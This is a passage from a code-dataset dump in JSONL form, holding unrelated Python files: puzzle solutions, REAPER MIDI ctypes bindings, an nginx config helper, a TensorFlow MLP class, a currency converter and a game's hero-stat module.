just biology, so it's a nice phrase to be familiar with :)\n#Implementation notes\n#\n#The Hamming distance is only defined for sequences of equal length, so an attempt to calculate it between sequences of different lengths #should not work. 
The general handling of this situation (e.g., raising an exception vs returning a special value) may differ between #languages.\n####################################################################################################################################\n","sub_path":"hamming.py","file_name":"hamming.py","file_ext":"py","file_size_in_byte":2341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"651926755","text":"budgets = []\nanswer = []\nn = int(input())\nc = int(input())\nfor i in range(n):\n b = int(input())\n budgets.append(b)\nbudgets.sort()\nwhile len(budgets)!=0:\n mean_price = c/len(budgets)\n if budgets[0] >= mean_price:\n answer.append(round(mean_price))\n c -= round(mean_price)\n del budgets[0]\n else:\n answer.append(budgets[0])\n c -= budgets[0]\n del budgets[0]\nif c>0:\n print(\"IMPOSSIBLE\")\nelse:\n answer.sort()\n for i in answer:\n print(i)\n","sub_path":"Nice code/codingame/The Gift.py","file_name":"The Gift.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"275641266","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: C:\\Users\\despres\\Desktop\\reaper\\scripts\\reapy\\reapy\\additional_api.py\n# Compiled at: 2020-04-18 05:35:37\n# Size of source mod 2**32: 16652 bytes\nimport ctypes as ct\nfrom reapy import reascript_api as RPR\nfrom reapy.reascript_api import _RPR\n\ndef packs_l(v: str, encoding='latin-1') -> ct.c_char_p:\n MAX_STRBUF = 4194304\n return ct.create_string_buffer(str(v).encode(encoding), MAX_STRBUF)\n\n\ndef unpacks_l(v):\n return str(v.value.decode('latin-1'))\n\n\ndef MIDI_GetEvt(take, evtidx, selectedOut, mutedOut, ppqposOut, msg, msg_sz):\n a = _RPR._ft['MIDI_GetEvt']\n f = ct.CFUNCTYPE(ct.c_byte, ct.c_uint64, ct.c_int, ct.c_void_p, ct.c_void_p, ct.c_void_p, ct.c_char_p, ct.c_void_p)(a)\n t = (\n _RPR.rpr_packp('MediaItem_Take*', take), ct.c_int(evtidx),\n ct.c_byte(selectedOut), ct.c_byte(mutedOut), ct.c_double(ppqposOut),\n packs_l(msg), ct.c_int(msg_sz))\n r = f(t[0], t[1], ct.byref(t[2]), ct.byref(t[3]), ct.byref(t[4]), t[5], ct.byref(t[6]))\n return (\n r, take, evtidx, int(t[2].value), int(t[3].value), float(t[4].value),\n unpacks_l(t[5]), int(t[6].value))\n\n\ndef MIDI_GetHash(p0, p1, p2, p3):\n a = _RPR._ft['MIDI_GetHash']\n f = ct.CFUNCTYPE(ct.c_byte, ct.c_uint64, ct.c_byte, ct.c_char_p, ct.c_int)(a)\n t = (\n _RPR.rpr_packp('MediaItem_Take*', p0), ct.c_byte(p1), packs_l(p2), ct.c_int(p3))\n r = f(t[0], t[1], t[2], t[3])\n return (r, p0, p1, unpacks_l(t[2]), p3)\n\n\ndef MIDI_GetTrackHash(p0, p1, p2, p3):\n a = _RPR._ft['MIDI_GetTrackHash']\n f = ct.CFUNCTYPE(ct.c_byte, ct.c_uint64, ct.c_byte, ct.c_char_p, ct.c_int)(a)\n t = (_RPR.rpr_packp('MediaTrack*', p0),\n ct.c_byte(p1), packs_l(p2), ct.c_int(p3))\n r = f(t[0], t[1], t[2], t[3])\n return (r, p0, p1, unpacks_l(t[2]), p3)\n\n\ndef MIDI_InsertEvt(take, selected, muted, ppqpos, bytestr, bytestr_sz):\n a = _RPR._ft['MIDI_InsertEvt']\n f = ct.CFUNCTYPE(ct.c_byte, ct.c_uint64, ct.c_byte, ct.c_byte, ct.c_double, ct.c_char_p, ct.c_int)(a)\n t = (\n _RPR.rpr_packp('MediaItem_Take*', take),\n ct.c_byte(selected),\n ct.c_byte(muted),\n ct.c_double(ppqpos),\n packs_l(bytestr),\n ct.c_int(bytestr_sz))\n r = f(t[0], t[1], t[2], t[3], t[4], t[5])\n return r\n\n\ndef MIDI_InsertTextSysexEvt(take, selected, muted, ppqpos, type_, 
bytestr, bytestr_sz):\n a = _RPR._ft['MIDI_InsertTextSysexEvt']\n f = ct.CFUNCTYPE(ct.c_byte, ct.c_uint64, ct.c_byte, ct.c_byte, ct.c_double, ct.c_int, ct.c_char_p, ct.c_int)(a)\n t = (\n _RPR.rpr_packp('MediaItem_Take*', take),\n ct.c_byte(selected),\n ct.c_byte(muted),\n ct.c_double(ppqpos),\n ct.c_int(type_),\n packs_l(bytestr),\n ct.c_int(bytestr_sz))\n r = f(t[0], t[1], t[2], t[3], t[4], t[5], t[6])\n return r\n\n\ndef MIDI_SetEvt(p0, p1, p2, p3, p4, p5, p6, p7):\n a = _RPR._ft['MIDI_SetEvt']\n f = ct.CFUNCTYPE(ct.c_byte, ct.c_uint64, ct.c_int, ct.c_void_p, ct.c_void_p, ct.c_void_p, ct.c_char_p, ct.c_int, ct.c_void_p)(a)\n t = (\n _RPR.rpr_packp('MediaItem_Take*', p0), ct.c_int(p1), ct.c_byte(p2), ct.c_byte(p3),\n ct.c_double(p4), packs_l(p5), ct.c_int(p6), ct.c_byte(p7))\n r = f(t[0], t[1], ct.byref(t[2]), ct.byref(t[3]), ct.byref(t[4]), t[5], t[6], ct.byref(t[7]))\n return (\n r, p0, p1, int(t[2].value), int(t[3].value), float(t[4].value), p5, p6,\n int(t[7].value))","sub_path":"pycfiles/python_reapy-0.6.0-py2.py3-none-any/additional_api.cpython-37.py","file_name":"additional_api.cpython-37.py","file_ext":"py","file_size_in_byte":3469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"92983311","text":"from __future__ import unicode_literals, print_function, division\nfrom veil.profile.installer import *\n\nNGINX_PID_PATH = '/tmp/nginx.pid'\n\n\ndef nginx_program(servers, enable_compression=False, has_bunker=False, is_bunker=False, bunker_ip=None, **kwargs):\n return objectify({\n 'nginx': {\n 'execute_command': 'nginx -c {}'.format(VEIL_ETC_DIR / 'nginx.conf'),\n 'run_as': 'root',\n 'priority': 400,\n 'resources': [('veil.frontend.nginx.nginx_resource', {\n 'servers': servers,\n 'config': dict({\n 'enable_compression': enable_compression,\n 'has_bunker': has_bunker,\n 'is_bunker': is_bunker,\n 'bunker_ip': bunker_ip\n }, **kwargs)\n })]\n }\n })\n\n\ndef nginx_server(server_name, listen, locations, upstreams=None, error_page=None, error_page_dir=None, ssl=False, default_server=False, additional_listens=(),\n **kwargs):\n return {\n server_name: dict({\n 'listen': '{}{}{} ipv6only=off'.format(listen, ' ssl' if ssl else '', ' default_server' if default_server else ''),\n 'additional_listens': additional_listens,\n 'locations': locations,\n 'upstreams': upstreams,\n 'error_page': error_page,\n 'error_page_dir': error_page_dir\n }, **kwargs)\n }\n\n\ndef nginx_reverse_proxy_location(upstream_host, upstream_port):\n return {\n '_': '''\n proxy_pass http://{}:{};\n '''.format(upstream_host, upstream_port)\n }\n","sub_path":"src/veil/frontend/nginx_setting.py","file_name":"nginx_setting.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"73654908","text":"# /bin/env python3\n\nimport os\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.preprocessing import Imputer, MinMaxScaler\n\nclass MLP():\n def __init__(\n self,\n mse_target=1e-4,\n max_epochs=1000,\n hidden_layer_sizes=None,\n output_fn=tf.identity,\n verbose=False,\n learning_rate=0.001,\n ):\n print(\"init\")\n self.net = None\n self._initialized = False\n\n self.mse_target = mse_target\n self.max_epochs = max_epochs\n self._verbose = verbose\n if hidden_layer_sizes is not None:\n if type(hidden_layer_sizes) is not tuple:\n raise Exception(\"invalid hidden layer architecure\")\n if len(hidden_layer_sizes) <= 0:\n raise Exception(\"invalid hidden layer architecure, length is 
zero\")\n self.hidden_layer_sizes = hidden_layer_sizes\n self.output_fn = output_fn\n self.learning_rate = learning_rate\n\n def _initializers(self, x_shape, y_shape):\n print(\"initializers\")\n if hasattr(self, \"_initialized\") and self._initialized:\n return\n\n self._x_shape = x_shape\n self._y_shape = y_shape\n\n # Initializers\n sigma = 1\n weight_initializer = tf.variance_scaling_initializer(\n mode=\"fan_avg\",\n distribution=\"uniform\",\n scale=sigma\n )\n bias_initializer = tf.zeros_initializer()\n\n # Data placeholders\n self._X = tf.placeholder(dtype=tf.float32, shape=[None, x_shape[1]])\n self._Y = tf.placeholder(dtype=tf.float32, shape=[None, y_shape[1]])\n\n n_target = y_shape[1]\n\n neurons = [x_shape[1]]\n hiddens = [self._X]\n\n for layer in self.hidden_layer_sizes:\n n_neurons = 0\n activation = None\n if type(layer) is int:\n n_neurons = layer\n activation = tf.nn.relu\n elif type(layer) is tuple:\n if len(layer) != 2:\n raise Exception(\"invalid layer tuple size\")\n n_neurons = layer[0]\n activation = layer[1]\n else:\n raise Exception(\"invalid type of layer\")\n # Layer: Variables for hidden weights and biases\n W_hidden = tf.Variable(\n weight_initializer([neurons[-1], n_neurons])\n )\n neurons.append(n_neurons)\n bias_hidden = tf.Variable(bias_initializer([n_neurons]))\n # Hidden layer\n hiddens.append(\n activation(\n tf.add(tf.matmul(hiddens[-1], W_hidden), bias_hidden)\n )\n )\n\n # Output layer: Variables for output weights and biases\n W_out = tf.Variable(weight_initializer([neurons[-1], n_target]))\n bias_out = tf.Variable(bias_initializer([n_target]))\n\n # Output layer\n self._out = self.output_fn(\n tf.add(tf.matmul(hiddens[-1], W_out), bias_out))\n\n # Cost function\n self._mse = tf.reduce_mean(tf.squared_difference(self._out, self._Y))\n\n # Optimizer\n self._opt = tf.train.AdamOptimizer(\n learning_rate=self.learning_rate,\n ).minimize(self._mse)\n\n # Saver\n self._saver = tf.train.Saver()\n\n # Session\n if not hasattr(self, \"net\") or self.net is None:\n self.net = tf.InteractiveSession()\n\n # Init\n self.net.run(tf.global_variables_initializer())\n\n self._initialized = True\n\n def fit(self, X, y):\n if type(X) is not np.ndarray:\n raise TypeError()\n if type(y) is not np.ndarray:\n raise TypeError()\n if len(X.shape) < 2:\n raise Exception(\"invalid matrix shape\")\n if len(y.shape) < 2:\n raise Exception(\"invalid matrix shape\")\n self._initializers(X.shape, y.shape)\n\n # Build train and test data set\n train_start = 0\n train_end = int(np.floor(0.8 * X.shape[0]))\n test_start = train_end + 1\n test_end = X.shape[0]\n X_data_train = X[np.arange(train_start, train_end), :]\n X_test = X[np.arange(test_start, test_end), :]\n y_data_train = y[np.arange(train_start, train_end), :]\n y_test = y[np.arange(test_start, test_end), :]\n\n # Fit neural net\n batch_size = 256\n mse_train = []\n mse_test = []\n\n mse_actual = np.finfo(np.float32).max\n epochs = 0\n\n while mse_actual > self.mse_target and epochs < self.max_epochs:\n # Shuffle training data\n shuffle_indices = np.random.permutation(\n np.arange(X_data_train.shape[0]))\n X_train = X_data_train[shuffle_indices]\n y_train = y_data_train[shuffle_indices]\n\n if X.shape[0] <= batch_size:\n self.net.run(\n self._opt,\n feed_dict={self._X: X_train, self._Y: y_train})\n mse_train.append(\n self.net.run(\n self._mse,\n feed_dict={self._X: X_train, self._Y: y_train}))\n mse_test.append(\n self.net.run(\n self._mse,\n feed_dict={self._X: X_test, self._Y: y_test}))\n mse_actual = mse_train[-1]\n\n 
if np.mod(epochs, 50) == 0 and self._verbose:\n print(\"Epoch:\", epochs)\n print('MSE Train:', mse_train[-1])\n print('MSE Test:', mse_test[-1])\n else:\n # Minibatch training\n for i in range(0, X.shape[0] // batch_size):\n start = i * batch_size\n batch_x = X_train[start:start + batch_size]\n batch_y = y_train[start:start + batch_size]\n # Run optimizer with batch\n self.net.run(\n self._opt,\n feed_dict={self._X: batch_x, self._Y: batch_y})\n mse_train.append(\n self.net.run(\n self._mse,\n feed_dict={self._X: X_train, self._Y: y_train}))\n mse_test.append(\n self.net.run(\n self._mse,\n eed_dict={self._X: X_test, self._Y: y_test}))\n mse_actual = mse_train[-1]\n\n if np.mod(epochs, 50) == 0 and self._verbose:\n print(\"Epoch:\", epochs)\n print('MSE Train:', mse_train[-1])\n print('MSE Test:', mse_test[-1])\n\n epochs += 1\n self.mse_train = mse_train\n self.mse_test = mse_test\n return self\n\n def score(self, X, y_true):\n \"\"\" R^2 coefficient\n The best possible score is 1.0 and it can be negative\n (because the model can be arbitrarily worse). A constant\n model that always predicts the expected value of y,\n disregarding the input features, would get a R^2 score of 0.0.\n (from sklearn documentation)\n \"\"\"\n if not self._initialized:\n raise Exception(\"Not initialized. Run fit first.\")\n if type(X) is not np.ndarray:\n raise TypeError()\n if type(y_true) is not np.ndarray:\n raise TypeError()\n if len(X.shape) < 2:\n raise Exception(\"invalid matrix shape\")\n if len(y_true.shape) < 2:\n raise Exception(\"invalid matrix shape\")\n y_pred = self.net.run(self._out, feed_dict={self._X: X})\n u = ((y_true - y_pred) ** 2).sum()\n v = ((y_true - y_true.mean()) ** 2).sum()\n return (1 - u/v)\n\n def predict(self, X):\n if not self._initialized:\n raise Exception(\"Not initialized. 
Run fit first.\")\n if type(X) is not np.ndarray:\n raise TypeError()\n if len(X.shape) < 2:\n raise Exception(\"invalid matrix shape\")\n # Prediction\n pred = self.net.run(self._out, feed_dict={self._X: X})\n return pred\n\n def save(self, filename):\n fname = os.path.basename(filename)\n directory = os.path.dirname(filename)\n _, file_extension = os.path.splitext(filename)\n if directory != \"\":\n directory += \"/\"\n model_path = directory + fname + \".tfmodel\" \n self._model_path = model_path\n import pickle\n with open(filename, mode='wb') as outfile:\n pickle.dump(self, outfile, protocol=4)\n\n def load(self, filename):\n import pickle\n with open(filename, mode='rb') as f:\n rna = pickle.load(f)\n self.__dict__.update(rna.__dict__)\n self._initializers(self._x_shape, self._y_shape)\n \n def _save_tf(self, model_file=\"\"):\n if model_file == \"\":\n model_file = self._model_path\n #path = os.path.abspath(model_file)\n if not os.path.isdir(model_file):\n os.mkdir(model_file)\n model_file = model_file + \"/\"\n self._save_path = self._saver.save(self.net, model_file)\n \n def _load_tf(self, model_file=\"\"):\n if model_file == \"\":\n model_file = self._save_path\n self._saver.restore(self.net, model_file)\n\n def _serialize_hidden_layers(self, hidden):\n out = []\n for h in hidden:\n if type(h) is tuple:\n if len(h) != 2:\n raise Exception(\"invalid hidden layer tuple\")\n if type(h[0]) is not int:\n raise Exception(\"invalid hidden layer neurons number\")\n if not hasattr(h[1], '__call__'):\n raise Exception(\"invalid hidden layer activation function\")\n out.append([h[0], _ser_fn_activation(h[1])])\n elif type(h) is int:\n out.append(h)\n else:\n raise Exception(\"invalid type\")\n return tuple(out)\n\n def _unserialize_hidden_layers(self, hidden):\n out = []\n for h in hidden:\n if type(h) is list:\n if len(h) != 2:\n raise Exception(\"invalid hidden layer tuple\")\n if type(h[0]) is not int:\n raise Exception(\"invalid hidden layer neurons number\")\n if type(h[1]) is not str:\n raise Exception(\"invalid hidden layer activation function\")\n out.append(tuple([h[0], _unser_fn_activation(h[1])]))\n elif type(h) is int:\n out.append(h)\n else:\n raise Exception(\"invalid type:\", type(h))\n return tuple(out)\n\n def __getstate__(self):\n print(\"getstate\")\n if not self._initialized:\n raise Exception(\"Not initialized. Run fit first.\")\n state = {\n \"mse_target\": self.mse_target,\n \"max_epochs\": self.max_epochs,\n \"_verbose\": self._verbose,\n \"_x_shape\": self._x_shape,\n \"_y_shape\": self._y_shape,\n \"mse_train\": self.mse_train,\n \"mse_test\": self.mse_test,\n \"hidden_layer_sizes\":\n self._serialize_hidden_layers(self.hidden_layer_sizes),\n \"output_fn\": _ser_fn_activation(self.output_fn),\n \"learning_rate\": self.learning_rate,\n }\n if hasattr(self, \"_model_path\"):\n self._save_tf()\n state[\"_model_path\"] = self._model_path\n state[\"_save_path\"] = self._save_path\n else:\n print(\"### No path to save the model\")\n return state\n\n def __setstate__(self, state):\n print(\"setstate\")\n # Restore instance attributes (i.e., filename and lineno).\n hl = self._unserialize_hidden_layers(state[\"hidden_layer_sizes\"])\n state[\"hidden_layer_sizes\"] = hl\n state[\"output_fn\"] = _unser_fn_activation(state[\"output_fn\"])\n self.__dict__.update(state)\n # Restore the previously opened file's state. 
To do so, we need to\n # reopen it and read from it until the line count is restored.\n if hasattr(self, \"_save_path\"):\n # Session\n if not hasattr(self, \"net\") or self.net is None:\n self.net = tf.InteractiveSession()\n # Saver\n self._saver = tf.train.Saver()\n # Load model\n self._load_tf()\n else:\n self._initializers(self._x_shape, self._y_shape)\n print(\"### no model to load\")\n\n def __enter__(self):\n print(\"enter\")\n self._initialized = False\n if not hasattr(self, \"net\") or self.net is None:\n self.net = tf.InteractiveSession()\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n print(\"exit\")\n if hasattr(self, \"net\"):\n self.net.close()\n\n def close(self):\n \"\"\"\" \n Closes the RNA.\n Closes the underlay session with TensorFlow.\n \"\"\"\n if hasattr(self, \"net\") and self.net is not None:\n self.net.close()\n\n\ndef _ser_fn_activation(fn):\n \"\"\"\n Return the name of one function.\n \"\"\"\n # if fn is tf.nn.relu:\n # return \"relu\"\n # elif tf.nn.sigmoid.__name__:\n # return \"sigmoid\"\n # raise Exception(\"function unknown, can't serialize\")\n return fn.__name__\n\n\ndef _unser_fn_activation(name):\n \"\"\"\n Return the function with name.\n \"\"\"\n if name == \"relu\":\n return tf.nn.relu\n elif name == \"sigmoid\":\n return tf.nn.sigmoid\n elif name == \"identity\":\n return tf.identity\n elif name == \"round\":\n return tf.round\n raise Exception(\"unknown function\")\n\ndef _make_matrix_classes(y):\n y_max = max(y)[0]\n out = np.zeros((y.shape[0], y_max + 1), dtype=int)\n for i in range(out.shape[0]):\n out[i, y[i]] = 1\n return out\n\nif __name__ == '__main__':\n from sklearn.datasets import load_iris\n from sklearn.datasets import load_linnerud\n from sklearn.model_selection import StratifiedKFold\n from sklearn.model_selection import ShuffleSplit\n\n # with MLP(\n # mse_target=1e-4,\n # max_epochs=100000,\n # hidden_layer_sizes=(16, 100, (12, tf.nn.sigmoid)),\n # output_fn=tf.nn.sigmoid,\n # verbose=False,\n # ) as rna:\n # iris = load_iris()\n\n # skf = StratifiedKFold(n_splits=4)\n # train_index, test_index = next(iter(skf.split(iris.data, iris.target)))\n\n # X_train = iris.data[train_index]\n # y_train = iris.target[train_index]\n # X_test = iris.data[test_index]\n # y_test = iris.target[test_index]\n\n # X_train = np.array(X_train)\n # y_train = np.array(y_train)\n # X_test = np.array(X_test)\n # y_test = np.array(y_test)\n\n # y_train = np.reshape(y_train, (y_train.shape[0], 1))\n # y_test = np.reshape(y_test, (y_test.shape[0], 1))\n\n # y_train = _make_matrix_classes(y_train)\n # y_test = _make_matrix_classes(y_test)\n\n # rna.fit(X_train, y_train)\n # y_pred = rna.predict(X_test)\n # s = rna.score(X_test, y_test)\n # print(\"score: {}\".format(s))\n \n with MLP(\n mse_target=1e-8,\n max_epochs=1e8,\n hidden_layer_sizes=(6, 30, 30, 6),\n output_fn=tf.nn.sigmoid,\n verbose=True,\n learning_rate=1e-6,\n ) as rna:\n linnerud = load_linnerud()\n\n ss = ShuffleSplit()\n train_index, test_index = next(iter(ss.split(linnerud.data)))\n\n X_train = linnerud.data[train_index]\n y_train = linnerud.target[train_index]\n X_test = linnerud.data[test_index]\n y_test = linnerud.target[test_index]\n\n X_train = np.array(X_train)\n y_train = np.array(y_train)\n X_test = np.array(X_test)\n y_test = np.array(y_test)\n\n norm_x = MinMaxScaler(feature_range=(0.0, 1.0), copy=True)\n norm_y = MinMaxScaler(feature_range=(0.0, 1.0), copy=True)\n\n X_train = norm_x.fit_transform(X_train)\n X_test = norm_x.transform(X_test)\n y_train = 
norm_y.fit_transform(y_train)\n y_test = norm_y.transform(y_test)\n\n rna.fit(X_train, y_train)\n s = rna.score(X_test, y_test)\n print(\"score: {}\".format(s))\n \n y_pred = rna.predict(X_test)\n print(norm_y.inverse_transform(y_test))\n print(norm_y.inverse_transform(y_pred))\n rna.save(\"mlp.model\")\n\n with MLP() as rna:\n rna.load(\"mlp.model\")\n y_pred = rna.predict(X_test)\n print(norm_y.inverse_transform(y_pred))\n","sub_path":"mlp/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":16655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"536613156","text":"'''\r\nKurt Burdick\r\n3/2/2017\r\nProject #1 - A banking program to simulate currency conversions\r\nCode that does currency conversions between US, EU, and CD\r\nand applies a fee for the type of transaction choosen\r\n'''\r\n\r\ndef main():\r\n\r\n end=\"go\"\r\n \r\n while(end!=\"quit\"):\r\n print('Currencies Available For Conversions Are: (1)US (2)EU and (3)CD')\r\n \r\n currentmoney=int(input('Enter the number for your Current Money: '))\r\n \r\n while(not(currentmoney==1 or currentmoney==2 or currentmoney==3)):\r\n print('Error, Please Enter a Valid Currency.')\r\n currentmoney=int(input('Enter the number for your Current Money: '))\r\n \r\n desiredmoney=int(input('Enter the number for your Desired Money: '))\r\n \r\n while(not(desiredmoney==1 or desiredmoney==2 or desiredmoney==3)or desiredmoney==currentmoney):\r\n print('Error, Please Enter a Valid Currency, or A Conversion is Required.')\r\n desiredmoney=int(input('Enter the number for your Desired Money: '))\r\n \r\n amount=float(input('Enter the Amount of money that you want to Convert: '))\r\n \r\n while(amount<=0):\r\n print('Error, Please Reenter a Valid Amount.')\r\n amount=float(input('Enter the Amount of Money you want to Convert: '))\r\n \r\n while(currentmoney!=desiredmoney and amount>0):\r\n amount=amount\r\n result=0\r\n \r\n if(currentmoney==1 and desiredmoney==2):\r\n result=(amount*.88)\r\n \r\n elif(currentmoney==1 and desiredmoney==3):\r\n result=(amount*1.29)\r\n \r\n elif(currentmoney==2 and desiredmoney==1):\r\n result=(amount*1.13)\r\n \r\n elif(currentmoney==2 and desiredmoney==3):\r\n result=(amount*1.46)\r\n \r\n elif(currentmoney==3 and desiredmoney==1):\r\n result=(amount*.78)\r\n \r\n elif(currentmoney==3 and desiredmoney==2):\r\n result=(amount*.69)\r\n \r\n transaction=int(input('Enter the number for the type of transction desired: (1)Check (2)Cash: '))\r\n while(transaction!=1 and transaction!=2):\r\n print('Please Reenter Valid Input')\r\n transaction=int(input('Enter the number for the type of transction desired: (1)Check (2)Cash: '))\r\n \r\n if(transaction==1):\r\n fee=0.01\r\n \r\n elif(transaction==2):\r\n fee=0.05\r\n \r\n totalfee=fee*amount\r\n \r\n if(currentmoney==1):\r\n currentmoney=\"US\"\r\n \r\n elif(currentmoney==2):\r\n currentmoney=\"EU\"\r\n \r\n elif(currentmoney==3):\r\n currentmoney=\"CD\"\r\n \r\n if(desiredmoney==1):\r\n desiredmoney=\"US\"\r\n \r\n elif(desiredmoney==2):\r\n desiredmoney=\"EU\"\r\n \r\n elif(desiredmoney==3):\r\n desiredmoney=\"CD\"\r\n \r\n print(\"Total Fee: \"+str(totalfee))\r\n print(\"Current Money: \"+str(amount)+\" \"+str(currentmoney))\r\n print(\"Received Money: \"+str(result)+\" \"+str(desiredmoney))\r\n amount=0\r\n \r\n end=input('Enter \"quit\" to end program or nothing to continue: 
')\r\n\r\nmain()\r\n\r\n\r\n","sub_path":"currency_converter.py","file_name":"currency_converter.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"597390721","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'Wang Chao'\n__date__ = '12/30/13'\n\n\nfrom mongoengine import DoesNotExist\nfrom core.mongoscheme import MongoHero, MongoAchievement, MongoHeroSoul, MongoCharacter\nfrom core.signals import hero_add_signal, hero_changed_signal, hero_step_up_signal, hero_to_soul_signal\nfrom core.formation import Formation\nfrom core.exception import SanguoException\nfrom core.resource import Resource\nfrom utils import cache\nfrom core.msgpipe import publish_to_char\nfrom utils import pack_msg\nfrom utils.functional import id_generator\nfrom preset.settings import HERO_MAX_STEP, HERO_START_STEP, HERO_STEP_UP_SOCKET_AMOUNT\nfrom preset.data import HEROS, ACHIEVEMENTS, MONSTERS\nfrom preset import errormsg\nimport protomsg\n\nfrom dll import external_calculate\n\ndef char_heros_dict(char_id):\n heros = MongoHero.objects.filter(char=char_id)\n return {h.id: h for h in heros}\n\ndef char_heros_obj(char_id):\n heros = char_heros_dict(char_id)\n return [Hero.cache_obj(i) for i in heros.keys()]\n\n\ndef cal_hero_property(original_id, level, step):\n \"\"\"\n\n @param original_id: hero original id\n @type original_id: int\n @param level: hero level (char level)\n @type level: int\n @return: (attack, defense, hp)\n @rtype: tuple\n \"\"\"\n hero = HEROS[original_id]\n\n attack = external_calculate.Hero.attack(level, step, hero.quality, hero.attack_growing)\n defense = external_calculate.Hero.defense(level, step, hero.quality, hero.defense_growing)\n hp = external_calculate.Hero.hp(level, step, hero.quality, hero.hp_growing)\n\n return attack, defense, hp\n\n\ndef cal_monster_property(oid, level):\n monster = MONSTERS[oid]\n\n attack = external_calculate.Hero.attack(level, 0, monster.quality, monster.attack)\n defense = external_calculate.Hero.defense(level, 0, monster.quality, monster.defense)\n hp = external_calculate.Hero.hp(level, 0, monster.quality, monster.hp)\n\n return attack, defense, hp\n\n\nclass FightPowerMixin(object):\n @property\n def power(self):\n a = self.attack * 2.5 * (1 + self.crit / 200.0)\n # b = (self.hp + self.defense * 5) * (1 + self.dodge / 2.0)\n b = self.hp + self.defense * 5\n return int(a + b)\n\n\nclass Hero(FightPowerMixin):\n def __init__(self, hid):\n self.hero = MongoHero.objects.get(id=hid)\n char = MongoCharacter.objects.get(id=self.hero.char)\n\n self.id = hid\n self.oid = self.hero.oid\n self.step = self.hero.step\n self.progress = self.hero.progress\n self.level = char.level\n self.char_id = char.id\n\n self.attack, self.defense, self.hp = \\\n cal_hero_property(self.oid, self.level, self.step)\n\n self.model_hero = HEROS[self.oid]\n self.crit = self.model_hero.crit\n self.dodge = self.model_hero.dodge\n self.anger = self.model_hero.anger\n\n self.default_skill = self.model_hero.default_skill\n\n self.skills = [int(i) for i in self.model_hero.skills.split(',')]\n\n self._add_equip_attrs()\n self._add_achievement_buffs()\n\n def _add_equip_attrs(self):\n from core.item import Equipment\n f = Formation(self.char_id)\n socket = f.find_socket_by_hero(self.id)\n if not socket:\n return\n\n # 先把装备数值加到人物上\n equipments = []\n for x in ['weapon', 'armor', 'jewelry']:\n equip_id = getattr(socket, x)\n if equip_id:\n equip = Equipment(self.char_id, equip_id)\n self.attack += 
equip.attack\n self.defense += equip.defense\n self.hp += equip.hp\n\n equipments.append(equip)\n\n # 然后加成人��的专属装备\n additions = {}\n special_equipments = self.model_hero.special_equipments\n if special_equipments:\n for equip in equipments:\n _cls = equip.equip.cls\n if _cls not in special_equipments:\n continue\n\n _tp = equip.equip.tp\n additions[_tp] = additions.get(_tp, 0) + special_equipments[_cls]\n\n for _tp, _add_percent in additions.items():\n if _tp == 1:\n # attack\n self.attack *= (1 + _add_percent / 100.0)\n elif _tp == 2:\n # defense\n self.defense *= (1 + _add_percent / 100.0)\n else:\n # hp\n self.hp *= (1 + _add_percent / 100.0)\n self.hp = int(self.hp)\n\n # 最后再把宝石加上\n for equip in equipments:\n for k, v in equip.gem_attributes.iteritems():\n value = getattr(self, k)\n setattr(self, k, value + v)\n\n\n def _add_achievement_buffs(self):\n try:\n mongo_ach = MongoAchievement.objects.get(id=self.char_id)\n except DoesNotExist:\n return\n\n buffs = {}\n for i in mongo_ach.complete:\n ach = ACHIEVEMENTS[i]\n if not ach.buff_used_for:\n continue\n\n buffs[ach.buff_used_for] = buffs.get(ach.buff_used_for, 0) + ach.buff_value\n\n for k, v in buffs.iteritems():\n value = getattr(self, k)\n if k == 'crit':\n new_value = value + v / 100\n else:\n new_value = value * (1 + v / 10000.0)\n\n new_value = int(new_value)\n setattr(self, k, new_value)\n\n\n def save_cache(self):\n cache.set('hero:{0}'.format(self.id), self)\n\n @staticmethod\n def cache_obj(hid):\n h = cache.get('hero:{0}'.format(hid))\n if h:\n return h\n\n h = Hero(hid)\n h.save_cache()\n return h\n\n\n @property\n def max_socket_amount(self):\n # 当前升阶全部孔数\n if self.step >= HERO_MAX_STEP:\n return 0\n return HERO_STEP_UP_SOCKET_AMOUNT[self.step]\n\n @property\n def current_socket_amount(self):\n # 当前已经点亮的孔数\n return self.hero.progress\n\n\n def step_up(self):\n # 升阶\n if self.step >= HERO_MAX_STEP:\n raise SanguoException(\n errormsg.HERO_REACH_MAX_STEP,\n self.char_id,\n \"Hero Step Up\",\n \"Hero {0} reach max step {1}\".format(self.id, HERO_MAX_STEP)\n )\n\n resource_needs = {}\n cost_gold = external_calculate.Hero.step_up_using_gold(self.model_hero.quality)\n\n resource_needs['gold'] = -cost_gold\n soul_needs_amount = external_calculate.Hero.step_up_using_soul_amount(self.model_hero.quality)\n\n hs = HeroSoul(self.char_id)\n self_soul_amount = hs.soul_amount(self.oid)\n\n common_soul_needs = soul_needs_amount - self_soul_amount\n if common_soul_needs <= 0:\n # don't need common soul\n resource_needs['souls'] = [(self.oid, soul_needs_amount)]\n else:\n # need common soul\n resource_needs['stuffs'] = [(22, common_soul_needs)]\n\n resource = Resource(self.char_id, \"Hero Step Up\", 'step up {0}'.format(self.id))\n try:\n resource.check_and_remove(**resource_needs)\n except SanguoException as e:\n if e.error_id == errormsg.SOUL_NOT_ENOUGH or e.error_id == errormsg.STUFF_NOT_ENOUGH:\n raise SanguoException(\n errormsg.HERO_STEP_UP_ALL_NOT_ENOUGH,\n self.char_id,\n \"Hero Step Up\",\n \"soul not enough\"\n )\n raise e\n\n # 扣完东西了,开始搞一次\n self.hero.progress += 1\n if self.hero.progress >= self.max_socket_amount:\n # 真正的升阶\n # 否则仅仅是记录当前状态\n self.hero.step 